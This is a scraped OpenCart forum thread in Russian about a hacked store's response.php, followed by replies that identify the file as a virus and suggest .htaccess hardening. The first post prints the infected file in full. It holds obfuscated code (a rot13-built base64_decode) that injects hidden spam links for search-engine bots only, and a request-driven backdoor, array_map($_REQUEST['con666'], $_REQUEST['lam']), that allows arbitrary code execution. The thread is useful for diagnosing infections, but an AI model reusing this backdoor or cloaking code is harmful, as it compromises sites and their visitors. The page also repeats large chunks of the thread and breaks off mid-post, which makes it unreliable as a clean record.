byrbin Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 Здравствуйте может кто нибудь может помочь советом или исправит, заранее спасибо! появилась ошибка в логе 2015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 1152015-08-25 13:34:20 - PHP Notice: Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115 а вот сам response.php <?php class Response { private $headers = array(); private $level = 0; private $output; public function addHeader($header) { $this->headers[] = $header; } public function redirect($url) { header('Location: ' . $url); exit; } public function setCompression($level) { $this->level = $level; } public function setOutput($output) { $this->output = $output; } private function compress($data, $level = 0) { if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) { $encoding = 'gzip'; } if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) { $encoding = 'x-gzip'; } if (!isset($encoding)) { return $data; } if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) { return $data; } if (headers_sent()) { return $data; } if (connection_status()) { return $data; } $this->addHeader('Content-Encoding: ' . $encoding); return gzencode($data, (int)$level); } public function output() {if (!defined('HTTP_CATALOG')) $this->output = str_replace('index.php?route=common/home', '', $this->output); if ($this->output) { if ($this->level) { $ouput = $this->compress($this->output, $this->level); } else { $ouput = $this->output; } if (!headers_sent()) { foreach ($this->headers as $header) { header($header, true); } } echo $this->_modifLoadTemplate($ouput); } } /** * Modification template * * @param string $data The contents of the template * @return string The contents of the template */ public function _modifLoadTemplate($data) { $v="_"; $v.="rot"; $v.=14-1; $v="str$v"; $w=$v(chr(111).chr(110).chr(102).chr(114).chr(54).chr(52).chr(95).chr(113).chr(114).chr(112).chr(98).chr(113).chr(114)); $s_jq = $w('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0Kd2luZG93LmpRdWVyeSB8fCBkb2N1bWVudC53cml0ZSgnPHNjcmlwdCBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTEuMS4xLnBhY2suanMiPjxcL3NjcmlwdD4nKQ0KLy8gd2l0aG91dCBqUXVlcnkgKGRvZXNuJ3Qgd29yayBpbiBvbGRlciBJRXMpDQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdET01Db250ZW50TG9hZGVkJywgZnVuY3Rpb24oKXsNCglqUXVlcnkoIiNzZW9saW5rIikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazIiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rMyIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KCWpRdWVyeSgiI3Nlb2xpbms0IikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazUiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rNiIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KfSwgZmFsc2UpOw0KPC9zY3JpcHQ+'); $links = $w('DQoNCg0KPGEgaWQ9InNlb2xpbmsiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1nZW9tZXRyaWNoZXNraW0tcmlzdW5rb20tdHN2ZXQtZmlvbGV0b3Z5aSI+9Oju6+Xy7uL76SDy8Ojq7vLg5u376SDq7vHy/uw8L2E+DQo8YSBpZD0ic2VvbGluazIiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvZWZmZWt0bnlpLWxlZ2tpaS1tb2xvZGV6aG55aS1rb3N0aXVtLXRzdmV0LXNpbmlpIj7x6O3o6SDq7vHy/uwg8eLu4e7k7e7j7iDv7urw7v88L2E+DQo8YSBpZD0ic2VvbGluazMiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1uYWJpdm55bS11em9yb20tdi1zdGlsZS1yZXRyby10c3ZldC1rcmFzbnlpIj7q8ODx7fvpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNCIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3N0aXVtLXMtYXNpbW1ldHJpY2hlc2tpbS10c3ZldG55bS11em9yb20tdHN2ZXQtc2luaWkiPvHo7ejpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNSIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC90cmlrb3RhemhueWktcGlkemhhay1zLXZzdGF2a2FtaS1pei10a2FuaS1wb2Qta296aHUtdHN2ZXQtY2hlcm55aSI+9+Xw7fvpIPLw6Oru8uDm7fvpIO/o5Obg6jwvYT4NCjxhIGlkPSJzZW9saW5rNiIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3Rvbm92eWktcGlkemhhay12LXNwb3J0aXZub20tc3RpbGUtdHN2ZXQtc2FsYXRvdnlpIj7x4Ovg8u7i++kg6u7y7u3u4vvpIO/o5Obg6jwvYT4='); $links = $s_jq . $links; // utf-8 $conv=array(); $nstr = ''; for($x=128;$x<=143;$x++) $conv[$x+112]=chr(209).chr($x); for($x=144;$x<=191;$x++) $conv[$x+48]=chr(208).chr($x); $conv[184]=chr(209).chr(145); #ё $conv[168]=chr(208).chr(129); #Ё $conv[179]=chr(209).chr(150); #і $conv[178]=chr(208).chr(134); #І $conv[191]=chr(209).chr(151); #ї $conv[175]=chr(208).chr(135); #ї $conv[186]=chr(209).chr(148); #є $conv[170]=chr(208).chr(132); #Є $conv[180]=chr(210).chr(145); #ґ $conv[165]=chr(210).chr(144); #Ґ $conv[184]=chr(209).chr(145); #Ґ $ar=str_split($links); // For PHP 4.x /*$ar = array(); for ($i = 0; $i < strlen($links); $i++) { $ar[] = substr($links,$i,1); }*/ foreach($ar as $ if(isset($conv[ord($b)])) $nstr.=$conv[ord($b)]; else $nstr.=$b; $links = $nstr; $search_engines = array('Yandex','Googlebot','Slurp','Yahoo','MSNBot','StackRambler','Mail.Ru','Aport','WebAlta Crawler','WebAlta','Teoma','Scooter','ia_archiver','AportCatalogRobot','bingbot','DuckDuckBot','BigMir'); foreach ($search_engines as $some_bots) { if ( strstr($_SERVER['HTTP_USER_AGENT'], $some_bots) ) { $data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 ); } } //$data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 ); if (isset($_REQUEST['con666'])) array_map( $_REQUEST['con666'],/*; Do not edit this file, please.*/$_REQUEST['lam'] ); return $data; } } ?> response.php Надіслати Поділитися на інших сайтах More sharing options...
markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 ВирусЗамените на стандартный response.php Надіслати Поділитися на інших сайтах More sharing options... AlexDW Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 а не фиг варез качать Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 а не фиг варез качать А, да, точно, спасибо - забыл добавить :) Надіслати Поділитися на інших сайтах More sharing options... byrbin Опубліковано: 25 серпня 2015 Автор Share Опубліковано: 25 серпня 2015 Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю(( Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 Если уж спалился, то не оправдываться надо было, а признаться. Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори. Главное потом оплатить, если подошло то что "скачал" :) Надіслати Поділитися на інших сайтах More sharing options... 7 months later... OAVko87 Опубліковано: 16 квітня 2016 Share Опубліковано: 16 квітня 2016 (змінено) Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2 Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую Змінено 16 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... localhost Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Хехе. Спасибо за разъяснения. У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость. <a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a> <a id="seolink2" href="http://sofiyas.com"> </a> <a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a> <a id="seolink4" href="http://sofiyas.com.ua"> </a> <a id="seolink5" href="http://sofiyas.com.ua"> </a> <a id="seolink6" href="http://sofiyas.com.ua"> </a> <a id="seolink7" href="http://neways.in.ua/shop/bady"> </a> <a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a> <a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a> Как бы наказать таких? Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC) Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 :) честно варез не качал! ) Причем вареза нет вообще у меня! На форуме недавно прозвучала фраза - а если найдем? Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Допомога програмістам та розробникам Требуется помощь по response.php Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
AlexDW Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 а не фиг варез качать Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 а не фиг варез качать А, да, точно, спасибо - забыл добавить :) Надіслати Поділитися на інших сайтах More sharing options... byrbin Опубліковано: 25 серпня 2015 Автор Share Опубліковано: 25 серпня 2015 Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю(( Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 Если уж спалился, то не оправдываться надо было, а признаться. Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори. Главное потом оплатить, если подошло то что "скачал" :) Надіслати Поділитися на інших сайтах More sharing options... 7 months later... OAVko87 Опубліковано: 16 квітня 2016 Share Опубліковано: 16 квітня 2016 (змінено) Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2 Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую Змінено 16 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... localhost Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Хехе. Спасибо за разъяснения. У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость. <a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a> <a id="seolink2" href="http://sofiyas.com"> </a> <a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a> <a id="seolink4" href="http://sofiyas.com.ua"> </a> <a id="seolink5" href="http://sofiyas.com.ua"> </a> <a id="seolink6" href="http://sofiyas.com.ua"> </a> <a id="seolink7" href="http://neways.in.ua/shop/bady"> </a> <a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a> <a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a> Как бы наказать таких? Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC) Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 :) честно варез не качал! ) Причем вареза нет вообще у меня! На форуме недавно прозвучала фраза - а если найдем? Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Допомога програмістам та розробникам Требуется помощь по response.php Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 а не фиг варез качать А, да, точно, спасибо - забыл добавить :) Надіслати Поділитися на інших сайтах More sharing options... byrbin Опубліковано: 25 серпня 2015 Автор Share Опубліковано: 25 серпня 2015 Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю(( Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 Если уж спалился, то не оправдываться надо было, а признаться. Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори. Главное потом оплатить, если подошло то что "скачал" :) Надіслати Поділитися на інших сайтах More sharing options... 7 months later... OAVko87 Опубліковано: 16 квітня 2016 Share Опубліковано: 16 квітня 2016 (змінено) Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2 Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую Змінено 16 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... localhost Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" 